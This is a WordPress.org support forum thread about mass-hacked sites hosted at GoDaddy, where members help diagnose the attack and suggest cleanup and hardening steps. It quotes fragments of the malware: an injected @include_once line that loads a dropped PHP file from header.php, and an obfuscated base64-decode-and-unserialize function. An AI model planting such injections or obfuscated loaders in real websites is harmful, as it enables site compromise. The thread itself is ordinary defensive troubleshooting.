WordPress.org

Ready to get started?Download WordPress

Forums

header.php file getting hacked (11 posts)

  1. shawn00m
    Member
    Posted 11 months ago #

    I'm experiencing a hacking problem with most of my WordPress installations. There are two things that are happening. First a new php file is uploaded to the wp-includes folder. What this file does, I do not know. I don't understand PHP well enough. I would be happy to share it if if would help.

    The second thing is a piece of code that is inserted after the opening body tag in the header.php file. Here is a sample of this code:
    <?php /* start_extra_placement_ */ @include_once("/home/content/54/9357554/html/wp-includes/Oyk5.php"); /* end_extra_placement_ */ ?>

    This problem is across multiple hosting accounts, although they are all hosted at GoDaddy. If anyone has any insights as to how these hackers are getting in and how I can prevent them from coming back, I would love to know. Thank you.

  2. Pioneer Valley Web Design
    Member
    Posted 11 months ago #

    It may prove beneficial to the community to use pastebin.com to share that file by linking to it here and also use Sucuri to scan your site and share any results also.

  3. shawn00m
    Member
    Posted 11 months ago #

    Thank you for your reply. Here is a link to the file at pastebin:
    [Moderator Note: Removed link to code used to exploit site]

  4. Pioneer Valley Web Design
    Member
    Posted 11 months ago #

    Please rebuild site:

    function current($token)
        {
            $func = 'ba' . 'se' . '6' . '4' . '_' . 'de' . 'co' . 'de';
            return unserialize($func($token));
        }

    Is malicious base64 eval code.

  5. The Hack Repair Guy
    Member
    Posted 11 months ago #

    You site has been compromised.

    Start by changing all passwords (FTP/godddy/admins).

    Then update WordPress, plugins and themes.

  6. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

  7. shawn00m
    Member
    Posted 11 months ago #

    Seacoast Web Design, I'm not understanding your comment.

    To others, I know my site was hacked. 13 of my sites were hacked on the same day at the same time over various hosting accounts. This isn't one site with one PW.

    My questions:

    Has anyone ever experienced something similar?
    Any suggestions on how all of the sites were hit simultaneously?
    Any advice to prevent it from happening again?

    Thank you.

  8. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

    Has anyone ever experienced something similar?

    We see hacked sites every day here, unfortunately. :-(

    Any suggestions on how all of the sites were hit simultaneously?

    Were they all on the same server or with the same hosts? Many hosts experienced problems due to mass attacks recently. Your hosts may have been one of them.

    Any advice to prevent it from happening again?

    Review Hardening WordPress as suggested above.

  9. shawn00m
    Member
    Posted 11 months ago #

    Thanks esmi. There were a total of 13 sites hacked on 5 different hosting accounts - all of them at GoDaddy - all at 5:17pm on May 18.

    A colleague of mine had the same issue the next day with 11 of his WP sites on 4 different hosting accounts - again all at GoDaddy.

    The big difference between his attacks and mine is that his hack included the installation of content and links related to ED medication. This caused one of his sites to get flagged by Google. None of mine experienced that, but the method was otherwise almost identical.

    While I'm trying to get help to prevent this, I also am trying to alert people to look at their sites for a similar attack. I wouldn't have known I was hacked if my colleague didn't tell me about his hacks. After seeing his sites, I checked my own and found the offending code.

  10. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

    all of them at GoDaddy - all at 5:17pm on May 18

    GoDaddy were definitely one of the hosts hit by the mass attacks. I assume you meant April 18 - not May 18, yes? If not, I'd like a ride in your time machine. ;-)

  11. shawn00m
    Member
    Posted 11 months ago #

    esmi, yes, it was April 18, not May 18. I wish I had a time machine to go back and catch the bums that did this. Thanks for your info. The Hardening WordPress info is helpful.

    I also found a plugin called Better WP Security. It does many of the things suggested on that page. Are you - or anyone reading this - familiar with it?

Reply

You must log in to post.

About this Topic